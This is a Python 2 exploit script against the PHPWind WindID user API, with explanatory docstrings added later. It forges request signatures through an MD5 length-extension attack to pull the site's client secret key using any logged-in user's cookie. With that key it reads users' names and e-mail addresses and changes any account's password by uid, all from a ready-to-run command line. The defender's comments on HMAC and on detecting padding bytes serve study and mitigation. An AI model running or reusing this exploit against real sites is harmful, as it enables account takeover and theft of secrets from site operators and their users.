  1. #!/usr/bin/env python
  2. # author: RickGray
  3. # update: 2016-05-25
  4. # >>>>>>>>>>>
  5. # requests, hashpumpy modules required
  6. # : pip install requests hashpumpy
  7.  
  8. import re
  9. import json
  10. import time
  11. import hashlib
  12. import argparse
  13. import operator
  14.  
  15. import requests
  16. import hashpumpy
  17.  
  18.  
def md5(s):
    """Return the hex MD5 digest of ``str(s)``.

    Python 2 only: ``str(s)`` is passed straight to ``hashlib.md5``, which on
    Python 3 raises ``TypeError`` because a ``bytes`` object is required.
    """
    return hashlib.md5(str(s)).hexdigest()
  21.  
  22.  
def ksort(d):
    """Return the items of ``d`` as a list of ``(key, value)`` pairs sorted by key.

    Named after PHP's ``ksort()``; the ``ksort($POST)`` remark further down
    suggests the server builds its signed string in the same key order.
    Uses ``dict.iteritems``, which exists only on Python 2.
    """
    sorted_d = sorted(d.iteritems(), key=operator.itemgetter(0))
    return sorted_d
  26.  
  27.  
def get_appkey(a, t, s, g, p):
    """Compute the WindID ``windidkey`` request signature.

    Args:
        a: client id, as a string.
        t: request timestamp, as a string.
        s: the client secret key.
        g: GET parameters (dict; sorted by key before signing).
        p: POST parameters (dict; sorted by key before signing).

    Returns:
        ``md5(md5(a + '||' + s) + t + ss)``, where ``ss`` is the ``key+value``
        concatenation of the sorted GET parameters followed by the sorted
        POST parameters, skipping every name listed in ``array``.

    Security note (defender's view): this is a bare MD5 over a secret-derived
    32-character prefix followed by request-controlled data, with no HMAC.
    Merkle-Damgard digests used this way are open to length extension: one
    observed (message, digest) pair is enough to produce a valid digest for a
    longer message without knowing the prefix, which is what
    ``get_clientid_and_secretkey`` below relies on.  The standard fix is an
    HMAC (e.g. ``hmac.new(secret, msg, hashlib.sha256)``) checked with
    ``hmac.compare_digest``.  Separately, any parameter whose name appears in
    ``array`` is omitted from the signed string, so its value is not covered
    by the signature at all.
    """
    # Parameter names left out of the signed string (presumably mirroring the
    # server-side check); their values are not authenticated by windidkey.
    array = ['windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token',
             'Filename', 'Upload', 'token', '__data']
    ss = ''
    get = ksort(g)
    post = ksort(p)
    for k, v in get:
        if k in array:
            continue
        ss += (str(k) + str(v))
    for k, v in post:
        if k in array:
            continue
        ss += (str(k) + str(v))

    # Inner md5 is the secret-derived prefix; outer md5 covers prefix || time || ss.
    return md5(md5(a + '||' + s) + t + ss)
  44.  
  45.  
def get_clientid_and_secretkey(t, c):
    """Obtain the WindID client id and secret key using a logged-in session cookie.

    Args:
        t: base URL of the target site (no trailing slash).
        c: a valid ``Cookie`` header value for any logged-in user.

    Returns:
        ``(clientid, secretkey)`` on success; ``None`` when the avatar page did
        not yield all of uid / windidkey / time / clientid.  Note the caller
        in ``__main__`` unpacks the result into two names, so the ``None``
        path surfaces there as a ``TypeError``.

    Why this works (so the weakness is clear): the avatar page embeds a WindID
    API call whose query string carries a valid ``windidkey`` over known
    parameters.  Because that signature is a bare MD5 with no HMAC (see
    ``get_appkey``), ``hashpumpy`` can extend the signed message with extra
    parameters and emit a matching digest without the secret prefix.  The
    extended request asks the ``app`` API for the client secret, which comes
    back as JSON.

    Mitigation / detection: an HMAC-based signature defeats the extension
    outright.  Until then the forged request is recognisable: one query
    parameter *name* carries the hash padding (a 0x80 byte, NULs and a length
    field), which no legitimate client sends; logging or rejecting
    non-printable bytes in parameter names would catch it.

    Python 2 only: on Python 3 ``requests`` returns ``bytes``, so the ``re``
    calls on ``text`` and ``fakedata.encode('hex')`` would fail.
    """
    # The four helpers pull URL-encoded query fragments ("%26" is "&",
    # "%3D" is "=") out of the avatar page HTML.
    def fetch_uid(p):
        pattern = r'%26uid%3D(?P<uid>[0-9]{1,})%26'
        result = re.search(pattern, p)
        return result.group('uid') if result else None

    def fetch_windidkey(p):
        # 32 hex chars: the MD5 hex digest produced by get_appkey.
        pattern = r'%26windidkey%3D(?P<windidkey>[a-f0-9]{32})'
        result = re.search(pattern, p)
        return result.group('windidkey') if result else None

    def fetch_time(p):
        pattern = r'%26time%3D(?P<time>[0-9]+)%26'
        result = re.search(pattern, p)
        return result.group('time') if result else None

    def fetch_clientid(p):
        pattern = r'%26clientid%3D(?P<clientid>.*?)%26'
        result = re.search(pattern, p)
        return result.group('clientid') if result else None

    # Avatar page: the embedded WindID call exposes uid, windidkey, time and
    # clientid as URL-encoded query parameters.
    _ = t + '/index.php?m=profile&c=avatar&_left=avatar'
    text = requests.get(_, headers={'Cookie': c}).content

    uid = fetch_uid(text)
    windidkey = fetch_windidkey(text)
    rtime = fetch_time(text)
    clientid = fetch_clientid(text)

    if uid and windidkey and rtime and clientid:
        print('[*] uid = %s' % uid)
        print('[*] windidkey = %s' % windidkey)
        print('[*] time = %s' % rtime)
        print('[*] clientid = %s' % clientid)

        # The message the observed windidkey signed: timestamp followed by the
        # key+value concatenation of the avatar call's parameters (same layout
        # as get_appkey builds).
        origin = rtime + 'adoAvatarcavatarmapitypeflashuid{}uidundefined'.format(uid)
        # a=get&c=app&m=api&id=1 str.=key+val ksort($POST)
        # Data to append: key+value of the POST body sent below (sorted by key).
        padding = 'agetcappid1mapi'
        # hashpump(observed_digest, original_message, data_to_append, prefix_len)
        # -> (digest of original||glue||appended, that extended message).
        # 32 is the length of the md5 hex-digest prefix that get_appkey
        # places before the timestamp.
        fakehash, fakedata = hashpumpy.hashpump(windidkey, origin, padding, 32)
        print('[*] fakehash = %s' % fakehash)
        print('[*] fakedata = 0x%s' % fakedata.encode('hex'))
        __ = t + '/windid/index.php'
        # The glue bytes (0x80 ... length) have to end up inside the server's
        # signed string; they are sent as the value of a query parameter whose
        # name is the original message minus the timestamp, so the server's
        # key+value concatenation reproduces the extended message.
        params = {
            origin.replace(rtime, ''): re.search(r'(\x80.*\x00)', fakedata).group(1),
            'clientid': clientid,
            'time': rtime,
            'windidkey': fakehash,
        }
        data = dict(a='get', c='app', id='1', m='api')
        response = requests.post(__,
                                 params=params,
                                 data=data, headers={'Cookie': c})
        print('[*] content = %s' % response.content)
        # KeyError/ValueError here propagate to the caller's broad except.
        secret = json.loads(response.content)['secretkey']
        return clientid, secret
    else:
        print('error in fetch data with content')
        return None
  104.  
  105.  
def fetch_user_info(t, clientid, secret, uid):
    """Print the username and e-mail of ``uid`` via the WindID ``user`` API.

    Args:
        t: base URL of the target site.
        clientid: WindID client id.
        secret: the client secret key.
        uid: numeric user id to look up.

    Side effects: one POST to ``/windid/index.php`` and three ``print`` calls.
    Returns nothing.  Raises ``KeyError`` if the JSON reply lacks
    ``username`` or ``email``.

    The request is signed with ``get_appkey`` exactly as a legitimate client
    would sign it, so whoever holds ``secret`` can issue the same calls as the
    legitimate client; protecting that secret is the real control.
    """
    _ = t + '/windid/index.php'
    ctime = str(int(time.time()))
    params = {
        'userid': uid,
        'time': ctime,
        'clientid': clientid
    }
    data = dict(a='get', c='user', m='api')
    # Sign over params (GET) and data (POST); 'time' and 'clientid' are in
    # get_appkey's skip list, so only userid and the POST body are covered.
    appkey = get_appkey(str(clientid), ctime, secret, params, data)
    params['windidkey'] = appkey
    response = requests.post(_, params=params, data=data)
    infos = json.loads(response.content)
    username = infos['username']
    email = infos['email']

    print('[*] uid = %s' % uid)
    print('[^] >>>>>>>>> username = %s' % username)
    print('[^] email = %s' % email)
  125.  
  126.  
def change_user_password(t, clientid, secret, uid, password):
    """Set a new password for ``uid`` through the WindID ``editUser`` API.

    Args:
        t: base URL of the target site.
        clientid: WindID client id.
        secret: the client secret key.
        uid: numeric user id whose password is changed.
        password: the new password.

    Returns:
        The raw response body; the caller in ``__main__`` treats ``'1'`` as
        success.

    Calls ``fetch_user_info`` first only to print which account is affected.
    Defender's note: as issued here the request carries only the client
    signature (``windidkey``) plus the target ``uid`` in the POST body --
    nothing ties it to the affected user's own session or current password,
    so the client secret alone is sufficient.  Server-side, a password change
    for a user should additionally require that user's authenticated context
    or a re-authentication step, and such calls should be logged per uid.
    """
    fetch_user_info(t, clientid, secret, uid)

    _ = t + '/windid/index.php'
    ctime = str(int(time.time()))
    params = {
        'time': ctime,
        'clientid': clientid
    }
    data = dict(uid=uid, a='editUser', c='user', m='api', password=password)
    appkey = get_appkey(str(clientid), ctime, secret, params, data)
    params['windidkey'] = appkey
    response = requests.post(_, params=params, data=data)

    return response.content
  142.  
  143.  
def parse_args():
    """Build the command-line interface and return the parsed arguments.

    Two sub-commands, selected via ``args.mode``:

    * ``getsecret``: ``-c/--cookie`` (``args.COOKIE``).
    * ``chpass``: ``-i/--clientid`` (int), ``-s/--secretkey``, ``-u/--uid``
      (int), ``-p/--password``.

    The positional ``TARGET`` (site base URL) is attached to the top-level
    parser, so on the command line it follows the sub-command's options.
    None of the options is marked ``required``; a missing one arrives as
    ``None`` and fails later inside the request code.
    """
    parser = argparse.ArgumentParser()

    subparsers = parser.add_subparsers(dest='mode')
    getsecret = subparsers.add_parser('getsecret', help='get secret key value')
    getsecret.add_argument('-c', '--cookie', dest='COOKIE', type=str,
                           help='the cookie logined with any user')

    chpass = subparsers.add_parser('chpass',
                                   help='change user password with secret key')
    chpass.add_argument('-i', '--clientid', dest='CLIENTID', type=int,
                        help='the clientid windid used')
    chpass.add_argument('-s', '--secretkey', dest='SECRETKEY', type=str,
                        help='the client secret key used')
    chpass.add_argument('-u', '--uid', dest='UID', type=int,
                        help='the user uid you want to change')
    chpass.add_argument('-p', '--password', dest='PASSWORD', type=str,
                        help='the password you want to change')

    parser.add_argument(dest='TARGET', type=str)

    return parser.parse_args()
  166.  
  167.  
# Entry point: dispatch on the sub-command chosen in parse_args().
if __name__ == '__main__':
    args = parse_args()

    if args.mode == 'getsecret':
        target = args.TARGET
        cookie = args.COOKIE
        try:
            # get_clientid_and_secretkey returns None on failure; unpacking
            # that raises TypeError, which the broad except below reports
            # with its message rather than a stack trace.
            cid, secretkey = get_clientid_and_secretkey(target, cookie)
            if cid and secretkey:
                print('')
                print('[^] >>>>>>>>> secretkey = %s' % secretkey)
                print('[^] clientid = %s' % cid)
        except Exception as ex:
            print('failed get secretkey, ("{}")'.format(str(ex)))
    elif args.mode == 'chpass':
        target = args.TARGET
        cid = args.CLIENTID
        key = args.SECRETKEY
        u = args.UID
        pp = args.PASSWORD
        try:
            res = change_user_password(target, cid, key, u, pp)
            # The API answers with a bare '1' on success (str comparison;
            # on Python 3 response.content would be bytes and never match).
            if res == '1':
                print('')
                print('[^] >>>>>>>>> succeed!')
                print('[^] password = %s' % pp)
        except Exception as ex:
            print('failed change user password, ("{}")'.format(str(ex)))